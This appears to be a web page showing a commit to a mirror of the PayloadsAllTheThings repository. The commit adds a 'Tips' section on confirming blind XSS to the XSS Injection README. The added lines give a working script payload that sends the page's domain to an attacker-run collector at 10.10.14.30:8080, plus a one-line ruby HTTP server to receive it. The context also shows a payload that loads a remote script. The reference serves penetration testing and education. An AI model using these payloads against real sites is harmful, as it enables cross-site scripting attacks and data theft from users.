Mirrors/PayloadsAllTheThings
6
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings synced 2024-06-30 19:02:55 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

XSS: add quick tips for bXSS

Browse Source
This commit is contained in:
Alexandre ZANNI 2021-06-16 13:25:46 +02:00 committed by GitHub
parent b006551bfe
commit c469236204
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 16 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
XSS Injection/README.md
View File

@ -453,6 +453,22 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu
- Comment Box
- Administrative Panel
### Tips
You can use [Data grabber for XSS](#data-grabber-for-xss) and a one-line HTTP server to confirm the existence of a blind XSS before deploying an heavy blind XSS platform.
Eg. payload
```html
<script>document.location='http://10.10.14.30:8080/XSS/grabber.php?c='+document.domain</script>
```
Eg. one-line HTTP server:
```
$ ruby -run -ehttpd . -p8080
```
## Mutated XSS
Use browsers quirks to recreate some HTML tags when it is inside an `element.innerHTML`.